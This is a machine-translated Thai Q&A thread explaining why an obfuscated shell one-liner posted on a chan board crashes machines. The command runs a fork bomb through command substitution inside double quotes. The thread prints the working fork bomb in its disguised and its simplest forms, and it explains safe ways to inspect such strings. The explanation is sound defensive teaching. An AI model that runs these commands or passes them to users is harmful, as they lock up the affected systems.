ทำไมข้อความนี้ถึงแยกเป็นส้อม?

พบได้ใน chan board แบบสุ่ม:

echo "I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode

การดำเนินการนี้จะส่งผลให้เกิดกระบวนการวางไข่อย่างไม่มีที่สิ้นสุดซึ่งอาละวาดและบดขยี้เครื่องให้หยุดชะงัก ฉันเห็นบางอย่างเกี่ยวกับ "su" พยายามที่จะถูกประหารชีวิตหลายครั้ง

.. ซึ่งแปลกเพราะฉันแค่คาดหวังว่าข้อความจะออกไม่ดำเนินการอะไร

การเรียกใช้ข้อความนี้ผ่านตัวถอดรหัสออนไลน์จะให้ไบนารีของ spew เป็นชุด:

ความยุ่งเหยิงของข้อความนี้เกิดขึ้นจริงและมีวิธี "ดู" อย่างปลอดภัยหรือไม่?

ก่อนอื่นมาดูคำสั่งทั้งหมด:

echo "I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode

มันมีสตริงที่ยกมาสองครั้งที่ได้รับการสะท้อนไป uudecode. แต่โปรดทราบว่าภายในสตริงที่มีเครื่องหมายคำพูดคู่คือ กลับคำพูด เชือก สตริงนี้ได้รับ ดำเนินการ . สตริงคือ:

`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`

หากเราดูว่ามีอะไรอยู่ในนั้นเราจะเห็นสามคำสั่ง:

rYWdl &
r()(Y29j & r{,3Rl7Ig} & r{,T31wo})
r

การแสดง รั้งการขยายตัว ในคำสั่งกลางเรามี:

rYWdl &
r()(Y29j & r r3Rl7Ig & r rT31wo)
r

บรรทัดแรกพยายามเรียกใช้คำสั่งไร้สาระในพื้นหลัง สิ่งนี้ไม่สำคัญ

บรรทัดที่สองมีความสำคัญ: มันกำหนดฟังก์ชั่น r ซึ่งเมื่อเรียกใช้จะเปิดตัวสำเนาสองชุด แน่นอนว่าแต่ละชุดจะเปิดตัวอีกสองชุด และอื่น ๆ

บรรทัดที่สามวิ่ง rเริ่มระเบิดส้อม

ส่วนที่เหลือของรหัสด้านนอกของสตริงที่ยกมาด้านหลังเป็นเพียงเรื่องไร้สาระสำหรับ obfuscation

วิธีรันคำสั่ง อย่างปลอดภัย

รหัสนี้สามารถทำงานได้อย่างปลอดภัยหากเราตั้งค่าขีด จำกัด ระดับการซ้อนฟังก์ชัน ซึ่งสามารถทำได้ด้วย bash's FUNCNEST ตัวแปร. ที่นี่เราตั้งเป็น 2 และสิ่งนี้จะหยุดการสอบถามซ้ำ:

$ export FUNCNEST=2
$ echo "I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode
bash: rYWdl: command not found
bash: Y29j: command not found
bash: r: maximum function nesting level exceeded (2)
bash: r: maximum function nesting level exceeded (2)
bash: r: maximum function nesting level exceeded (2)
bash: Y29j: command not found
bash: r: maximum function nesting level exceeded (2)
bash: Y29j: command not found
uudecode fatal error:
standard input: Invalid or missing 'begin' line

ข้อความแสดงข้อผิดพลาดด้านบนแสดงว่า (a) คำสั่งไร้สาระ rYWdl และ Y29j ไม่พบ (b) fork fork ถูกหยุดซ้ำ ๆ โดย FUNCNEST และ (c) เอาต์พุตของ echo ไม่ได้เริ่มต้นด้วย begin และดังนั้นจึงเป็นข้อมูลที่ไม่ถูกต้องสำหรับ uudecode.

ส้อมระเบิดในรูปแบบที่ง่ายที่สุด

ระเบิดส้อมจะมีลักษณะอย่างไรถ้าเราลบความสับสนออกไป ตามที่ njzk2 และ gerrit แนะนำมันจะมีลักษณะดังนี้:

echo "`r()(r&r);r`"

เราสามารถทำให้มันง่ายขึ้นไปอีก:

r()(r&r); r

ที่ประกอบด้วยสองข้อความ: หนึ่งกำหนด fork-bomb-function r และครั้งที่สองวิ่ง r.

รหัสอื่น ๆ ทั้งหมดรวมถึงไปป์ uudecodeมีเพียงเพื่อความสับสนและความผิดพลาด

แบบฟอร์มดั้งเดิมนั้นมีชั้นของการผิดทางอีกชั้นหนึ่ง

OP ได้จัดเตรียมไว้ ลิงค์ ไปยังกระดานสนทนาที่รหัสนี้ปรากฏขึ้น ตามที่แสดงไว้รหัสดูเหมือนว่า:

eval $(echo "I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode)

สังเกตเห็นหนึ่งในความคิดเห็นแรกเกี่ยวกับรหัสนี้:

ฉันตกหลุมรักมัน คัดลอกเฉพาะส่วนที่สะท้อนและถอดรหัส แต่ยัง   ถูกแยกออก

ในรูปแบบบนกระดานช่องทางหนึ่งคิดอย่างไร้เดียงสาว่าปัญหาจะเป็น eval คำสั่งปฏิบัติการบนผลลัพธ์ของ uudecode. สิ่งนี้จะนำไปสู่ความคิดที่ลบ eval จะแก้ปัญหา ดังที่เราได้เห็นด้านบนนี้เป็นเท็จและอันตรายดังนั้น

วิธีตอบคำถามส่วนที่สองของคุณ:

... มีวิธี "ดู" อย่างปลอดภัยหรือไม่

เพื่อคลี่คลายสตริงนี้ แทนที่อัญประกาศคู่ด้านนอกด้วยอัญประกาศเดี่ยวและหลีกเลี่ยงอัญประกาศเดี่ยวที่เกิดขึ้นภายในสตริง เช่นนี้เชลล์จะไม่เรียกใช้รหัสใด ๆ และคุณก็ผ่านทุกอย่างไป uudecode:

$ echo 'I<RA('\''1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;=='
I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==
$ echo 'I<RA('\''1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==' | uudecode
uudecode fatal error:
standard input: Invalid or missing 'begin' line

ทางเลือกอื่น ๆ ที่ระบุไว้ในความคิดเห็น:

แนะนำ kasperd :

$ uudecode
I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==
[press <Ctrl>+D]
uudecode fatal error:
standard input: Invalid or missing 'begin' line

จาค็อบครัลแนะนำ เพื่อใช้โปรแกรมแก้ไขข้อความวางเนื้อหาแล้วส่งไฟล์นั้นไปยัง uudecode

เพียงมองแวบแรกคุณอาจคิดว่า เอาต์พุตไปยังเชลล์จะไม่ถูกเรียกใช้งาน . นี่คือ ยังคงเป็นจริง . ปัญหามีอยู่แล้วใน อินพุต . เคล็ดลับหลักนี่คือสิ่งที่โปรแกรมเมอร์เรียก ลำดับความสำคัญของผู้ประกอบการ . นี่คือลำดับที่เชลล์พยายามประมวลผลอินพุตของคุณ:

1.       "                                                             "
2.                     rYWdl
3.                          &
4.                           r()(Y29j&r{,3Rl7Ig}&r{,T31wo})             
5.                                                         ;            
6.                                                          r           
7.                    `                                      `          
8.        I<RA('1E<W3t                                        26<F]F;== 
9.  echo                                                                
10.                                                                      |         
11.                                                                        uudecode

1. เขียนสตริงโดยดำเนินการคำสั่ง backticks ทั้งหมดที่อยู่ภายใน
2. มักจะเป็นคำสั่งที่ไม่รู้จักซึ่งจะทำให้เกิดผลลัพธ์บางอย่างเช่น หาก 'rYWdl' ไม่ใช่ตัวพิมพ์คุณสามารถใช้คำสั่งไม่พบเพื่อค้นหาแพ็คเกจที่มีมัน ... (ขึ้นอยู่กับระบบ)
3. ดำเนินการ 2. ในพื้นหลัง คุณจะไม่เห็นผลลัพธ์
4. กำหนดฟังก์ชั่นส้อมระเบิด
5. ตัวคั่นคำสั่ง
6. เรียกใช้ส้อมระเบิด
7. แทรกผลลัพธ์ของ 6. ลงใน String (เราไม่เคยมาที่นี่)

ข้อผิดพลาดคือการคิดว่า echo จะเป็นคำสั่งแรกที่จะถูกดำเนินการ uudecode ที่สอง. ทั้งสองอย่างนั้นจะไม่สามารถเข้าถึงได้

สรุป: เครื่องหมายคำพูดคู่เป็นสิ่งที่อันตรายเสมอบนเปลือกหอย